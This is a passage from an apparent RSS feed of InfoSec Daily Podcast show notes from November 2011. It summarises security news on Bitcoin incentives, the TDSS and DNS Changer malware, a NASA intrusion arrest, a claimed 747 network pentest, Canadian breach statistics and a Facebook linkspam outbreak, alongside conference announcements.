<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="https://coderrr.wordpress.com/2011/11/13/simplified-summary-of-microsoft-researchs-bitcoin-paper-on-incentivizing-transaction-propagation/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://coderrr.wordpress.com/2011/11/13/simplified-summary-of-microsoft-researchs-bitcoin-paper-on-incentivizing-transaction-propagation/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This is a very simplified summary of the Microsoft Research paper &ldquo;On Bitcoin and Red Balloons&rdquo;. This summary is meant for people who already understand how the Bitcoin network and protocol function. For an overview of that see the Bitcoin Wikipedia page.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The flaw pointed out in the paper is that there is a negative incentive for miners to forward Bitcoin transactions. By not forwarding you increase the chance that you receive the transaction&rsquo;s fee rather than another miner. This is not so much of an issue now as the fees usually total to much less than the 50BTC reward per block. But as the block reward diminishes in the future this negative incentive may become more of an issue.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The paper&rsquo;s proposed solution is to reward nodes who forward transactions as well as nodes who solve the block in which the transaction is included. Each transaction would have a chain of its forwarding nodes attached to it. When a miner solves a block all nodes in the chains that lead the transactions in that block to the miner would be rewarded. The issue with this is that a single node can forward to itself many times to illegitimately gain more of the reward. This is called a Sybil attack.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Their solution to the Sybil attack is to give 0 reward to all nodes in a chain of forwards if the length of that chain is greater than H. This gives a negative incentive to create fake forwards to yourself in attempt to gain multiple rewards for a single transaction. Your best bet is to forward legitimately to other nodes and hope the transaction reaches a miner who solves it before the number of forwards is greater than H.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The paper determines optimal strategies in terms of values for H and the functions to divide the fee between nodes in the chain. But this is all modeled on directed trees (which have no cycles) rather than a random graph (which is what the Bitcoin network is like in reality) so it&rsquo;s unknown how well it would work in practice. They leave work on random graphs for future research.</span></p>
<p>
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.theregister.co.uk/2011/11/14/tdss_drops_dns_changer/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2011/11/14/tdss_drops_dns_changer/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">One of the world&#39;s most advanced pieces of malware is being used to spread DNS Changer, a trojan at the heart of a massive click fraud scheme that has already hijacked 4 million PCs, security researchers said.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Just a few days after federal prosecutors in the US shuttered the international conspiracy, researchers from Dell SecureWorks said they discovered DNS Changer is being spread by TDSS. The rootkit, as previously reported, is among the hardest to detect and remove and is often used as a means to install keyloggers, tools for attacking websites, and other malware.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Once installed, DNS Changer is able to alter the DNS, or domain name system, settings that computers and routers use to find the IP numbers that correspond to domain names such as theregister.co.uk and google.com. By replacing legitimate DNS servers with servers under the control of the attackers, they are able to send victims to fraudulent websites instead of the destinations the victims intended to visit.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Last week, seven people from Estonia and Russia were criminally charged in a scam that for more than five years used DNS Charger to generate more than $14 million in profit. They racked up the windfall by redirecting victims to imposter websites that paid advertising fees to the attackers each time they were clicked on. The scheme preyed on users of computers running Microsoft Windows and Apple OS X operating systems. DNS Changer is also able to change DNS configuration settings in certain routers, particularly when they use default usernames and passwords.</span></p>
<p>
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.klfy.com/story/16054152/romanian-arrested-for-hacking-into-nasas-servers"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.klfy.com/story/16054152/romanian-arrested-for-hacking-into-nasas-servers</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A court in Romania has ordered the arrest of a Romanian man accused of hacking into NASA&#39;s servers. &nbsp;Court spokesman Lucian Marian in the northwest city of Cluj says Robert Butyka would be arrested for 29 days as he awaits trial.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The 26-year-old Romanian national, currently in detention, is charged with breaching security measures to access several of NASA&#39;s servers in December 2010.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Prosecutors said Wednesday that he interfered with server data, causing NASA losses of about $500,000 (euro371,000). There was no comment from the U.S. Embassy.</span><br />
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-524-deliberate-blundering-more-bind-lulz-shiesty-nodes-tdss-romanian-arrest/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3163/0/infosec-daily-podcast-episode-524.mp3" length="15752190" type="audio/mpeg" />
		<itunes:duration>0:32:46</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 524 for November 16, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Karthik Rangarajan, and Varun Sharma.
	Announcements:
	Brad Smith (theNurse) and his stroke at Hacker Halted:
	We all know and love Brad Sm[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 524 for November 16, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Karthik Rangarajan, and Varun Sharma.
	Announcements:
	Brad Smith (theNurse) and his stroke at Hacker Halted:
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Vote For Wim Remes
	When: Starts November 16, 2011
	Where: ISC2
	Who: CISSP&#8217;s
	http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	DerbyCon 2012 &#8211; &#34;The Reunion&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Marshall University (Huntington, West Virginia) is looking to hire a Assistant Professor-Information Assurance/Security. More info here: tinyurl.com/6lkh3o5 (Search Number: 12709)
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: https://www.eff.org/deeplinks/2011/11/public-shut-out-stop-online-piracy-act-hearings-again
	This morning, EFF&#8217;s staff and concerned netizens across the country tuned into the live webcast of the House Judiciary Committee&#8217;s hearing on the Stop Online Piracy Act (H.R. 3261). At least we tried to. Unfortunately, we were confronted with an incredibly poor webcast stream for much of the hearing. We find it ironic and deeply concerning that Congress is unable to successfully stream video of an event this important to all Internet users, even as they are debating a dangerous plan to change the Internet in fundamental ways and deputize Internet intermediaries to act like content police.
	Many of the online watchers took to Twitter to voice their concerns about being shut out of the hearing by the poor quality webcast. But the Internet community was shut out of the hearing in a more fundamental way: of the six witnesses called to testify on Congress&#8217; plan to heavily regulate the Internet, there was only one representative of the technology sector. &#160;As Public Knowledge&#8217;s Martyn Griffen tweeted: &#8220;#SOPA Hearing internet still fading in and out. It&#39;d be great if an internet engineer could fix the website issue in return for testifying.&#8221;
	We couldn&#8217;t agree more. Congressman Lamar Smith&#8217;s office noted the poor quality webcast, telling journalist Declan McCullagh: &#34;Our tech folks are trying to fix it, so please be patient.&#34; While the issue wasn&#8217;t resolved in time for concerned citizens across the nation to watch the testimonies, it was restored in time for the questions and answers at the end.
	Recorded video from the hearing should be posted online in the next few hours. &#160;Once it&#8217;s up, we&#8217;ll post the link here and provide you with our analysis. In the meantime, we urge individuals concerned about the bill to contact their members of Congress today and take part in the American Censorship Day online actions.
	Source: https://www.isc.org/software/bind/advisories/cve-2011-tbd
	An as-yet unidentified network event caused BIND 9 resolvers to cache an invalid record, subsequent queries for which could crash the resolvers wit[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 523 &#8211; 747 Hacking, Canada Target?, Fed-strength Auth, Facebook Porn &amp; Opt-Out</title>
		<link>http://www.isdpodcast.com/episode-523-747-hacking-canada-target-fed-strength-auth-facebook-porn-opt-out</link>
		<comments>http://www.isdpodcast.com/episode-523-747-hacking-canada-target-fed-strength-auth-facebook-porn-opt-out#comments</comments>
		<pubDate>Wed, 16 Nov 2011 01:56:38 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3134</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 523 for November 15, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, and Keith Pachulski. Announcements: Caption Contest. Gives us your best and worst caption or PhotoShopped version: &#160; Brad Smith (theNurse) and his stroke at Hacker Halted: We all know and love Brad Smith, aka theNurse. [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 523 for November 15, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, and Keith Pachulski.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Caption Contest. Gives us your best and worst caption or PhotoShopped version:<br />
	&nbsp;</span><img height="550px;" src="https://lh5.googleusercontent.com/hYa3e_0Om2MjMF25BySG5ipqEh_qwQ9gtos9LL-AMcKEixUg0tZGQ3-Zw1PojXnU9vvpeDttsLHHl8mUx53gu1A98-uAbuADCpqmQixbhdqBHIuNTZg" width="413px;" /></p>
<p>
	<img height="520px;" src="https://lh6.googleusercontent.com/tbMSNlrDqe0_BlnExD-rlmFX-xQZ4EPeIxFBd8iqNMh-tVXroZGmyiZGhDIXq_Fe9FNWo9Alr27pO3uq-3bEq_MtcAn4l6y8brGtIOBj5B6DnbCqVMA" width="409px;" /></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse) and his stroke at Hacker Halted:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Vote For Wim Remes</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 16, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: ISC2</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Who: CISSP&rsquo;s</span><br />
	<a href="http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;The Reunion&quot;</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="https://plus.google.com/117220625678034723010/posts/JTjn6u6uQG4"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://plus.google.com/117220625678034723010/posts/JTjn6u6uQG4</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">QUOTE: [Craig S Wright ] says: I was contracted to test the systems on a Boeing 747. They had added a new video system that ran over IP. They segregated this from the control systems using layer 2 &#8211; VLANs. We managed to break the VLANs and access other systems and with source routing could access the Engine management systems.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The response, &quot;the engine management system is out of scope.&quot;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For those who do not know, </span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">747&#39;s are big flying Unix hosts.</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> At the time, the engine management system on this particular airline was Solaris based. The patching was well behind and they used telnet as SSH broke the menus and the budget did not extend to fixing this. </span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The engineers could actually access the engine management system of a 747 in route. If issues are noted, they can re-tune the engine in air.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The issue here is that all that separated the engine control systems and the open network was NAT based filters. There were (and as far as I know this is true today), no extrusion controls. They filter incoming traffic, but all outgoing traffic is allowed. For those who engage in Pen Testing and know what a shoveled shell is&#8230; I need not say more.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://technology.canoe.ca/2011/11/15/18971056.html"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://technology.canoe.ca/2011/11/15/18971056.html</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hackers attacking Canadian organizations are determined to make money in targeted campaigns while government insiders stole more data than ever before, a security study released on Tuesday showed.&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The number of breaches in Canada and the cost of dealing with them have spiked since the 2008 financial crisis, according to a joint study from telecom company Telus and the University of Toronto&#39;s Rotman School of Management.&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The study, its fourth annual report, said the crisis had both pressured budgets for information security and created a darker &quot;threat environment.&quot;&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The average Canadian public company suffered 18 breaches in 2011, up from less than 12 breaches a year earlier, the study found. Government bodies were able to reverse the trend of increasing breaches; there were just over 17 this year after a spike above 22 last year.&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But insider breaches, where an employee deliberately accesses confidential information, spiked in the government sector despite falling in public and private companies.&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Forty-two per cent of breaches in government were perpetuated by insiders, which the researchers called &quot;the most startling finding from the research.&quot; </span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Sophisticated attacks are focused on individuals and their data and often seek a continuing information stream for financial or political gain, the study said.&nbsp;&nbsp;&nbsp; </span></p>
<p>
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.infoworld.com/d/mobile-technology/ios-android-get-federal-strength-authentication-179079"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.infoworld.com/d/mobile-technology/ios-android-get-federal-strength-authentication-179079</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Good Technology and ActivIdentity today jointly announced an effort to bring federal-level authentication to Apple iOS devices, such as the iPad and iPhone, and Google Android devices. And Apperian released its Enterprise App Services Environment (EASE) product for Android devices, which lets businesses provision and manage apps, and manage content delivered to those apps. EASE can manage Android Market apps, in-house Android apps, and HTML5 apps, and also provides push notification and updates.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Good-ActivIdentity effort seeks to bring multifactor authentication to iOS and Android devices, allowing them to work with CAC/PIV-standard smart cards and secure ID chips, as well as provide email and document encryption, cryptographic signing of emails and forms, and allow the use of public key infrastructure (PKI) authentication tools with custom applications. The companies say they intend to meet the DoD Directive 8100.2 and Homeland Security Presidential Directive 12 security standards in their joint products.<br class="kix-line-break" /><br />
	</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.thinq.co.uk/2011/11/15/facebook-users-hit-porn-attack-anonymous-blamed/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.thinq.co.uk/2011/11/15/facebook-users-hit-porn-attack-anonymous-blamed/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Facebook users have been bombarded with a torrent of hardcore porn as well as violent and gory images, after an exploit has tricked users into infecting their newsfeeds.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The outbreak began a few days ago, with users of the social network being duped into clicking on titillating images that appeared on their timelines, triggering the so-called &#39;linkspam virus&#39;.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The disturbing images, many relating to animal abuse, are reminiscent of the infamous &#39;/b/&#39; channel on image-posting board 4Chan, the community that spawned online &#39;hacktivist&#39; collective Anonymous &#8211; leading sites such as</span><a href="http://gawker.com/5859480/facebook-is-drowning-in-a-flood-of-hardcore-porn"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Gawker</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> to speculate that the Wikileaks-loving pranksters are behind the attack.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">After a DDoS attack brought 4Chan down yesterday, though, the Anons may have other matters on their minds.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Back in August, members of Anonymous had threatened an attack on Facebook timed for the 5th of November, with some sources speaking of a so-called &#39;Guy Wakes virus&#39; &#8211; though it swiftly backtracked on threats regarding so-called &#39;Operation Facebook&#39;.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Those threats were recently re-issued, but none of the communciations were issued via the usual Anonymous press releases or recognised Twitter feeds.</span><br />
